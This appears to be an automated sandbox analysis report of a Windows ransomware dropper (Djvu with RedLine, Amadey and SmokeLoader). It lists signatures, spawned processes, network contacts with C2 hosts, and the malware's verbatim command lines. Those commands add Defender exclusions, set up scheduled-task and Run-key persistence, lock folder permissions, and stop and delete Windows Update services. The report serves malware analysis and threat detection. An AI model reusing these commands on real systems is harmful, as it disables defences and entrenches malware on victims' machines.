Analysis Overview
SHA256
b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074
Threat Level: Known bad
The file b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074 was found to be: Known bad.
Malicious Activity Summary
Djvu Ransomware
Detected Djvu ransomware
Detect Fabookie payload
Amadey
Fabookie
RedLine
SmokeLoader
Downloads MZ/PE file
Stops running service(s)
Deletes itself
Reads user/profile data of web browsers
Modifies file permissions
Loads dropped DLL
Executes dropped EXE
Adds Run key to start application
Looks up external IP address via web service
Suspicious use of SetThreadContext
Launches sc.exe
Unsigned PE
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-07-23 14:43
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-23 14:43
Reported
2023-07-23 14:46
Platform
win10-20230703-en
Max time kernel
52s
Max time network
152s
Command Line
Signatures
Amadey
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Fabookie
RedLine
SmokeLoader
Downloads MZ/PE file
Stops running service(s)
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2767205360-3565838719-3800013281-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\aedd73e6-9adb-4462-acf1-aec438f9708d\\F52D.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\F52D.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4204 set thread context of 2696 | N/A | C:\Users\Admin\AppData\Local\Temp\F52D.exe | C:\Users\Admin\AppData\Local\Temp\F52D.exe |
| PID 4692 set thread context of 4112 | N/A | C:\Users\Admin\AppData\Local\Temp\3163.exe | C:\Users\Admin\AppData\Local\Temp\3163.exe |
| PID 4904 set thread context of 4524 | N/A | C:\Users\Admin\AppData\Local\Temp\F52D.exe | C:\Users\Admin\AppData\Local\Temp\F52D.exe |
| PID 4328 set thread context of 4576 | N/A | C:\Users\Admin\AppData\Local\Temp\38E6.exe | C:\Users\Admin\AppData\Local\Temp\38E6.exe |
| PID 360 set thread context of 4204 | N/A | C:\Users\Admin\AppData\Local\Temp\3CBF.exe | C:\Users\Admin\AppData\Local\Temp\3CBF.exe |
| PID 884 set thread context of 2368 | N/A | C:\Users\Admin\AppData\Local\Temp\4701.exe | C:\Users\Admin\AppData\Local\Temp\4701.exe |
| PID 4652 set thread context of 4988 | N/A | C:\Users\Admin\AppData\Local\Temp\3163.exe | C:\Users\Admin\AppData\Local\Temp\3163.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\System32\sc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\System32\sc.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\System32\sc.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oldplayer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe
"C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe"
C:\Users\Admin\AppData\Local\Temp\F52D.exe
C:\Users\Admin\AppData\Local\Temp\F52D.exe
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\F79F.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\F79F.dll
C:\Users\Admin\AppData\Local\Temp\F52D.exe
C:\Users\Admin\AppData\Local\Temp\F52D.exe
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\F8AA.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\F8AA.dll
C:\Users\Admin\AppData\Local\Temp\FC93.exe
C:\Users\Admin\AppData\Local\Temp\FC93.exe
C:\Users\Admin\AppData\Local\Temp\1E.exe
C:\Users\Admin\AppData\Local\Temp\1E.exe
C:\Users\Admin\AppData\Local\Temp\909.exe
C:\Users\Admin\AppData\Local\Temp\909.exe
C:\Users\Admin\AppData\Local\Temp\13A8.exe
C:\Users\Admin\AppData\Local\Temp\13A8.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\aedd73e6-9adb-4462-acf1-aec438f9708d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\aafg31.exe
"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
C:\Users\Admin\AppData\Local\Temp\F52D.exe
"C:\Users\Admin\AppData\Local\Temp\F52D.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\3163.exe
C:\Users\Admin\AppData\Local\Temp\3163.exe
C:\Users\Admin\AppData\Local\Temp\3163.exe
C:\Users\Admin\AppData\Local\Temp\3163.exe
C:\Users\Admin\AppData\Local\Temp\3CBF.exe
C:\Users\Admin\AppData\Local\Temp\3CBF.exe
C:\Users\Admin\AppData\Local\Temp\38E6.exe
C:\Users\Admin\AppData\Local\Temp\38E6.exe
C:\Users\Admin\AppData\Local\Temp\F52D.exe
"C:\Users\Admin\AppData\Local\Temp\F52D.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
C:\Users\Admin\AppData\Local\Temp\38E6.exe
C:\Users\Admin\AppData\Local\Temp\38E6.exe
C:\Users\Admin\AppData\Local\Temp\3CBF.exe
C:\Users\Admin\AppData\Local\Temp\3CBF.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Users\Admin\AppData\Local\Temp\4701.exe
C:\Users\Admin\AppData\Local\Temp\4701.exe
C:\Users\Admin\AppData\Local\Temp\48C7.exe
C:\Users\Admin\AppData\Local\Temp\48C7.exe
C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:N"
C:\Users\Admin\AppData\Local\Temp\3163.exe
"C:\Users\Admin\AppData\Local\Temp\3163.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\4701.exe
C:\Users\Admin\AppData\Local\Temp\4701.exe
C:\Users\Admin\AppData\Local\Temp\3163.exe
"C:\Users\Admin\AppData\Local\Temp\3163.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\38E6.exe
"C:\Users\Admin\AppData\Local\Temp\38E6.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\38E6.exe
"C:\Users\Admin\AppData\Local\Temp\38E6.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:N"
C:\Users\Admin\AppData\Local\Temp\3CBF.exe
"C:\Users\Admin\AppData\Local\Temp\3CBF.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\75E3.exe
C:\Users\Admin\AppData\Local\Temp\75E3.exe
C:\Users\Admin\AppData\Local\Temp\3CBF.exe
"C:\Users\Admin\AppData\Local\Temp\3CBF.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\2d8bb23e-3252-4b21-85dd-24435df8e989\build2.exe
"C:\Users\Admin\AppData\Local\2d8bb23e-3252-4b21-85dd-24435df8e989\build2.exe"
C:\Users\Admin\AppData\Local\Temp\75E3.exe
C:\Users\Admin\AppData\Local\Temp\75E3.exe
C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\4701.exe
"C:\Users\Admin\AppData\Local\Temp\4701.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\4701.exe
"C:\Users\Admin\AppData\Local\Temp\4701.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\75E3.exe
"C:\Users\Admin\AppData\Local\Temp\75E3.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\7e5be61e-971d-4ec9-ace4-0b4034dfc840\build2.exe
"C:\Users\Admin\AppData\Local\7e5be61e-971d-4ec9-ace4-0b4034dfc840\build2.exe"
C:\Users\Admin\AppData\Local\b8ac3a68-d9ec-4bf8-99a2-89564ebf6f7d\build2.exe
"C:\Users\Admin\AppData\Local\b8ac3a68-d9ec-4bf8-99a2-89564ebf6f7d\build2.exe"
C:\Users\Admin\AppData\Local\Temp\75E3.exe
"C:\Users\Admin\AppData\Local\Temp\75E3.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\43f82b68-edc8-4a1e-9011-0ea5099e13b2\build2.exe
"C:\Users\Admin\AppData\Local\43f82b68-edc8-4a1e-9011-0ea5099e13b2\build2.exe"
C:\Users\Admin\AppData\Local\84157034-ca5e-442c-bf8d-21d61ac80561\build2.exe
"C:\Users\Admin\AppData\Local\84157034-ca5e-442c-bf8d-21d61ac80561\build2.exe"
C:\Users\Admin\AppData\Local\2fa70290-fab9-4bdb-a9fa-fce0d79afe3f\build2.exe
"C:\Users\Admin\AppData\Local\2fa70290-fab9-4bdb-a9fa-fce0d79afe3f\build2.exe"
C:\Users\Admin\AppData\Local\2d8bb23e-3252-4b21-85dd-24435df8e989\build2.exe
"C:\Users\Admin\AppData\Local\2d8bb23e-3252-4b21-85dd-24435df8e989\build2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Users\Admin\AppData\Local\b8ac3a68-d9ec-4bf8-99a2-89564ebf6f7d\build2.exe
"C:\Users\Admin\AppData\Local\b8ac3a68-d9ec-4bf8-99a2-89564ebf6f7d\build2.exe"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Users\Admin\AppData\Local\7e5be61e-971d-4ec9-ace4-0b4034dfc840\build2.exe
"C:\Users\Admin\AppData\Local\7e5be61e-971d-4ec9-ace4-0b4034dfc840\build2.exe"
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop bits
C:\Users\Admin\AppData\Local\43f82b68-edc8-4a1e-9011-0ea5099e13b2\build2.exe
"C:\Users\Admin\AppData\Local\43f82b68-edc8-4a1e-9011-0ea5099e13b2\build2.exe"
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Users\Admin\AppData\Local\84157034-ca5e-442c-bf8d-21d61ac80561\build2.exe
"C:\Users\Admin\AppData\Local\84157034-ca5e-442c-bf8d-21d61ac80561\build2.exe"
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
C:\Users\Admin\AppData\Local\2fa70290-fab9-4bdb-a9fa-fce0d79afe3f\build2.exe
"C:\Users\Admin\AppData\Local\2fa70290-fab9-4bdb-a9fa-fce0d79afe3f\build2.exe"
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | potunulit.org | udp |
| US | 188.114.97.0:80 | potunulit.org | tcp |
| US | 8.8.8.8:53 | colisumy.com | udp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| US | 8.8.8.8:53 | 0.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.254.120.175.in-addr.arpa | udp |
| NL | 194.169.175.139:3003 | 194.169.175.139 | tcp |
| US | 8.8.8.8:53 | 139.175.169.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 254.217.0.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nordskills.eu | udp |
| PS | 213.6.54.58:443 | nordskills.eu | tcp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| DE | 45.9.74.80:80 | 45.9.74.80 | tcp |
| US | 8.8.8.8:53 | 58.54.6.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.14.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.74.9.45.in-addr.arpa | udp |
| FR | 178.32.90.250:29608 | | tcp |
| FR | 178.32.90.250:29608 | | tcp |
| US | 8.8.8.8:53 | 250.90.32.178.in-addr.arpa | udp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| US | 8.8.8.8:53 | us.imgjeoigaa.com | udp |
| HK | 103.100.211.218:80 | us.imgjeoigaa.com | tcp |
| US | 8.8.8.8:53 | 218.211.100.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aa.imgjeoogbb.com | udp |
| HK | 154.221.26.108:80 | aa.imgjeoogbb.com | tcp |
| US | 8.8.8.8:53 | 108.26.221.154.in-addr.arpa | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| RU | 5.42.65.80:80 | 5.42.65.80 | tcp |
| NL | 194.169.175.139:3003 | 194.169.175.139 | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 80.65.42.5.in-addr.arpa | udp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| FR | 178.32.90.250:29608 | | tcp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| US | 8.8.8.8:53 | zexeq.com | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| PE | 190.12.87.61:80 | zexeq.com | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 61.87.12.190.in-addr.arpa | udp |
| PE | 190.12.87.61:80 | zexeq.com | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| PE | 190.12.87.61:80 | zexeq.com | tcp |
| PE | 190.12.87.61:80 | zexeq.com | tcp |
| US | 8.8.8.8:53 | greenbi.net | udp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| US | 8.8.8.8:53 | 231.10.119.175.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.57.101.20.in-addr.arpa | udp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| PE | 190.12.87.61:80 | zexeq.com | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| PE | 190.12.87.61:80 | zexeq.com | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| PE | 190.12.87.61:80 | zexeq.com | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.193.132.51.in-addr.arpa | udp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| US | 8.8.8.8:53 | 22.249.124.192.in-addr.arpa | udp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| DE | 168.119.51.197:13370 | 168.119.51.197 | tcp |
| US | 8.8.8.8:53 | 197.51.119.168.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 168.119.51.197:13370 | 168.119.51.197 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 168.119.51.197:13370 | 168.119.51.197 | tcp |
Files
memory/2780-118-0x0000000002840000-0x0000000002940000-memory.dmp
memory/2780-119-0x0000000000400000-0x000000000246F000-memory.dmp
memory/2780-120-0x0000000003F50000-0x0000000003F59000-memory.dmp
